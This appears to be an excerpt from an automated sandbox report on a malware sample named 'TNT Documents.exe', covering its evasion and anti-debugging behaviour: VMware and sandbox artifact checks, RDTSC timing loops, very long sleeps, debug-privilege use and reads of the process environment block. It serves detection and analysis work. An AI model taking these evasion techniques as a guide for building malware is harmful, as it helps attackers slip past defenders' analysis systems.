Malware Analysis System Evasion:

barindex
Yara detected AntiVM3
Source: Yara match File source: Process Memory Space: TNT Documents.exe PID: 4548, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: WINE_GET_UNIX_FILE_NAME
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\TNT Documents.exe RDTSC instruction interceptor: First address: 0000000000408614 second address: 000000000040861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\TNT Documents.exe RDTSC instruction interceptor: First address: 00000000004089AE second address: 00000000004089B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 0000000003318614 second address: 000000000331861A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\mstsc.exe RDTSC instruction interceptor: First address: 00000000033189AE second address: 00000000033189B4 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
May sleep (evasive loops) to hinder dynamic analysis
Source: C:\Users\user\Desktop\TNT Documents.exe TID: 5188 Thread sleep time: -922337203685477s >= -30000s Jump to behavior
Sample execution stops while process was sleeping (likely an evasion)
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\mstsc.exe Last function: Thread delayed
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004088E0 rdtsc 7_2_004088E0
Contains long sleeps (>= 3 min)
Source: C:\Users\user\Desktop\TNT Documents.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process information queried: ProcessInformation Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Thread delayed: delay time: 922337203685477 Jump to behavior
Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 0000000B.00000000.305896440.0000000008A32000.00000004.00000001.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000
Source: explorer.exe, 0000000B.00000000.309276039.000000000ED78000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIOData Source=localhost\sqlexpress;Initial Catalog=dbSMS;Integrated Security=True
Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}e
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: SOFTWARE\VMware, Inc.\VMware Tools
Source: explorer.exe, 0000000B.00000000.298506976.00000000048E0000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 0000000B.00000000.306183659.0000000008B88000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}C
Source: explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000Datc
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMWARE
Source: explorer.exe, 0000000B.00000000.305962402.0000000008ACF000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000
Source: explorer.exe, 0000000B.00000000.339998059.00000000069DA000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD002
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: InstallPath%C:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMWARE"SOFTWARE\VMware, Inc.\VMware ToolsLHARDWARE\DEVICEMAP\Scsi\Scsi Port 1\Scsi Bus 0\Target Id 0\Logical Unit Id 0LHARDWARE\DEVICEMAP\Scsi\Scsi Port 2\Scsi Bus 0\Target Id 0\Logical Unit Id 0'SYSTEM\ControlSet001\Services\Disk\Enum
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: VMware SVGA II
Source: TNT Documents.exe, 00000000.00000002.294558244.00000000026EB000.00000004.00000001.sdmp Binary or memory string: vmwareNSYSTEM\ControlSet001\Control\Class\{4D36E968-E325-11CE-BFC1-08002BE10318}\0000

Anti Debugging:

barindex
Contains functionality for execution timing, often used to detect debuggers
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_004088E0 rdtsc 7_2_004088E0
Enables debug privileges
Source: C:\Users\user\Desktop\TNT Documents.exe Process token adjusted: Debug Jump to behavior
Source: C:\Users\user\Desktop\TNT Documents.exe Process token adjusted: Debug Jump to behavior
Source: C:\Windows\SysWOW64\mstsc.exe Process token adjusted: Debug Jump to behavior
Contains functionality to read the PEB
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157B944 mov eax, dword ptr fs:[00000030h] 7_2_0157B944
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157B944 mov eax, dword ptr fs:[00000030h] 7_2_0157B944
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155B171 mov eax, dword ptr fs:[00000030h] 7_2_0155B171
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155B171 mov eax, dword ptr fs:[00000030h] 7_2_0155B171
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155C962 mov eax, dword ptr fs:[00000030h] 7_2_0155C962
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559100 mov eax, dword ptr fs:[00000030h] 7_2_01559100
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559100 mov eax, dword ptr fs:[00000030h] 7_2_01559100
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559100 mov eax, dword ptr fs:[00000030h] 7_2_01559100
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158513A mov eax, dword ptr fs:[00000030h] 7_2_0158513A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158513A mov eax, dword ptr fs:[00000030h] 7_2_0158513A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 mov eax, dword ptr fs:[00000030h] 7_2_01574120
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 mov eax, dword ptr fs:[00000030h] 7_2_01574120
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 mov eax, dword ptr fs:[00000030h] 7_2_01574120
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 mov eax, dword ptr fs:[00000030h] 7_2_01574120
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01574120 mov ecx, dword ptr fs:[00000030h] 7_2_01574120
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0155B1E1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0155B1E1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155B1E1 mov eax, dword ptr fs:[00000030h] 7_2_0155B1E1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015E41E8 mov eax, dword ptr fs:[00000030h] 7_2_015E41E8
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582990 mov eax, dword ptr fs:[00000030h] 7_2_01582990
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157C182 mov eax, dword ptr fs:[00000030h] 7_2_0157C182
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158A185 mov eax, dword ptr fs:[00000030h] 7_2_0158A185
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h] 7_2_015D51BE
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h] 7_2_015D51BE
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h] 7_2_015D51BE
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D51BE mov eax, dword ptr fs:[00000030h] 7_2_015D51BE
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015861A0 mov eax, dword ptr fs:[00000030h] 7_2_015861A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015861A0 mov eax, dword ptr fs:[00000030h] 7_2_015861A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D69A6 mov eax, dword ptr fs:[00000030h] 7_2_015D69A6
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01570050 mov eax, dword ptr fs:[00000030h] 7_2_01570050
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01570050 mov eax, dword ptr fs:[00000030h] 7_2_01570050
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01612073 mov eax, dword ptr fs:[00000030h] 7_2_01612073
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01621074 mov eax, dword ptr fs:[00000030h] 7_2_01621074
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D7016 mov eax, dword ptr fs:[00000030h] 7_2_015D7016
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D7016 mov eax, dword ptr fs:[00000030h] 7_2_015D7016
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D7016 mov eax, dword ptr fs:[00000030h] 7_2_015D7016
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158002D mov eax, dword ptr fs:[00000030h] 7_2_0158002D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158002D mov eax, dword ptr fs:[00000030h] 7_2_0158002D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158002D mov eax, dword ptr fs:[00000030h] 7_2_0158002D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158002D mov eax, dword ptr fs:[00000030h] 7_2_0158002D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158002D mov eax, dword ptr fs:[00000030h] 7_2_0158002D
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01624015 mov eax, dword ptr fs:[00000030h] 7_2_01624015
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01624015 mov eax, dword ptr fs:[00000030h] 7_2_01624015
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h] 7_2_0156B02A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h] 7_2_0156B02A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h] 7_2_0156B02A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156B02A mov eax, dword ptr fs:[00000030h] 7_2_0156B02A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h] 7_2_015EB8D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov ecx, dword ptr fs:[00000030h] 7_2_015EB8D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h] 7_2_015EB8D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h] 7_2_015EB8D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h] 7_2_015EB8D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015EB8D0 mov eax, dword ptr fs:[00000030h] 7_2_015EB8D0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015558EC mov eax, dword ptr fs:[00000030h] 7_2_015558EC
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559080 mov eax, dword ptr fs:[00000030h] 7_2_01559080
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D3884 mov eax, dword ptr fs:[00000030h] 7_2_015D3884
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D3884 mov eax, dword ptr fs:[00000030h] 7_2_015D3884
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158F0BF mov ecx, dword ptr fs:[00000030h] 7_2_0158F0BF
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158F0BF mov eax, dword ptr fs:[00000030h] 7_2_0158F0BF
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158F0BF mov eax, dword ptr fs:[00000030h] 7_2_0158F0BF
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015990AF mov eax, dword ptr fs:[00000030h] 7_2_015990AF
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h] 7_2_015820A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h] 7_2_015820A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h] 7_2_015820A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h] 7_2_015820A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h] 7_2_015820A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015820A0 mov eax, dword ptr fs:[00000030h] 7_2_015820A0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155F358 mov eax, dword ptr fs:[00000030h] 7_2_0155F358
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155DB40 mov eax, dword ptr fs:[00000030h] 7_2_0155DB40
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01583B7A mov eax, dword ptr fs:[00000030h] 7_2_01583B7A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01583B7A mov eax, dword ptr fs:[00000030h] 7_2_01583B7A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155DB60 mov ecx, dword ptr fs:[00000030h] 7_2_0155DB60
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628B58 mov eax, dword ptr fs:[00000030h] 7_2_01628B58
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161131B mov eax, dword ptr fs:[00000030h] 7_2_0161131B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D53CA mov eax, dword ptr fs:[00000030h] 7_2_015D53CA
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D53CA mov eax, dword ptr fs:[00000030h] 7_2_015D53CA
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h] 7_2_015803E2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h] 7_2_015803E2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h] 7_2_015803E2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h] 7_2_015803E2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h] 7_2_015803E2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015803E2 mov eax, dword ptr fs:[00000030h] 7_2_015803E2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157DBE9 mov eax, dword ptr fs:[00000030h] 7_2_0157DBE9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01625BA5 mov eax, dword ptr fs:[00000030h] 7_2_01625BA5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158B390 mov eax, dword ptr fs:[00000030h] 7_2_0158B390
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582397 mov eax, dword ptr fs:[00000030h] 7_2_01582397
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01561B8F mov eax, dword ptr fs:[00000030h] 7_2_01561B8F
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01561B8F mov eax, dword ptr fs:[00000030h] 7_2_01561B8F
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160D380 mov ecx, dword ptr fs:[00000030h] 7_2_0160D380
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161138A mov eax, dword ptr fs:[00000030h] 7_2_0161138A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01584BAD mov eax, dword ptr fs:[00000030h] 7_2_01584BAD
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01584BAD mov eax, dword ptr fs:[00000030h] 7_2_01584BAD
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01584BAD mov eax, dword ptr fs:[00000030h] 7_2_01584BAD
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160B260 mov eax, dword ptr fs:[00000030h] 7_2_0160B260
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0160B260 mov eax, dword ptr fs:[00000030h] 7_2_0160B260
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628A62 mov eax, dword ptr fs:[00000030h] 7_2_01628A62
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015E4257 mov eax, dword ptr fs:[00000030h] 7_2_015E4257
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559240 mov eax, dword ptr fs:[00000030h] 7_2_01559240
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559240 mov eax, dword ptr fs:[00000030h] 7_2_01559240
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559240 mov eax, dword ptr fs:[00000030h] 7_2_01559240
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01559240 mov eax, dword ptr fs:[00000030h] 7_2_01559240
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0159927A mov eax, dword ptr fs:[00000030h] 7_2_0159927A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161EA55 mov eax, dword ptr fs:[00000030h] 7_2_0161EA55
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155AA16 mov eax, dword ptr fs:[00000030h] 7_2_0155AA16
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155AA16 mov eax, dword ptr fs:[00000030h] 7_2_0155AA16
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01555210 mov eax, dword ptr fs:[00000030h] 7_2_01555210
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01555210 mov ecx, dword ptr fs:[00000030h] 7_2_01555210
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01555210 mov eax, dword ptr fs:[00000030h] 7_2_01555210
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01555210 mov eax, dword ptr fs:[00000030h] 7_2_01555210
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01573A1C mov eax, dword ptr fs:[00000030h] 7_2_01573A1C
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01568A0A mov eax, dword ptr fs:[00000030h] 7_2_01568A0A
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01594A2C mov eax, dword ptr fs:[00000030h] 7_2_01594A2C
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01594A2C mov eax, dword ptr fs:[00000030h] 7_2_01594A2C
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161AA16 mov eax, dword ptr fs:[00000030h] 7_2_0161AA16
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161AA16 mov eax, dword ptr fs:[00000030h] 7_2_0161AA16
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582ACB mov eax, dword ptr fs:[00000030h] 7_2_01582ACB
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01582AE4 mov eax, dword ptr fs:[00000030h] 7_2_01582AE4
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158D294 mov eax, dword ptr fs:[00000030h] 7_2_0158D294
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158D294 mov eax, dword ptr fs:[00000030h] 7_2_0158D294
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156AAB0 mov eax, dword ptr fs:[00000030h] 7_2_0156AAB0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0156AAB0 mov eax, dword ptr fs:[00000030h] 7_2_0156AAB0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0158FAB0 mov eax, dword ptr fs:[00000030h] 7_2_0158FAB0
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h] 7_2_015552A5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h] 7_2_015552A5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h] 7_2_015552A5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h] 7_2_015552A5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015552A5 mov eax, dword ptr fs:[00000030h] 7_2_015552A5
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01577D50 mov eax, dword ptr fs:[00000030h] 7_2_01577D50
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01593D43 mov eax, dword ptr fs:[00000030h] 7_2_01593D43
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D3540 mov eax, dword ptr fs:[00000030h] 7_2_015D3540
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157C577 mov eax, dword ptr fs:[00000030h] 7_2_0157C577
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0157C577 mov eax, dword ptr fs:[00000030h] 7_2_0157C577
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01628D34 mov eax, dword ptr fs:[00000030h] 7_2_01628D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161E539 mov eax, dword ptr fs:[00000030h] 7_2_0161E539
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01563D34 mov eax, dword ptr fs:[00000030h] 7_2_01563D34
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01584D3B mov eax, dword ptr fs:[00000030h] 7_2_01584D3B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01584D3B mov eax, dword ptr fs:[00000030h] 7_2_01584D3B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01584D3B mov eax, dword ptr fs:[00000030h] 7_2_01584D3B
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0155AD30 mov eax, dword ptr fs:[00000030h] 7_2_0155AD30
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015DA537 mov eax, dword ptr fs:[00000030h] 7_2_015DA537
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h] 7_2_0161FDE2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h] 7_2_0161FDE2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h] 7_2_0161FDE2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_0161FDE2 mov eax, dword ptr fs:[00000030h] 7_2_0161FDE2
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_01608DF1 mov eax, dword ptr fs:[00000030h] 7_2_01608DF1
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h] 7_2_015D6DC9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h] 7_2_015D6DC9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h] 7_2_015D6DC9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov ecx, dword ptr fs:[00000030h] 7_2_015D6DC9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h] 7_2_015D6DC9
Source: C:\Users\user\Desktop\TNT Documents.exe Code function: 7_2_015D6DC9 mov eax, dword ptr fs:[00000030h] 7_2_015D6DC9
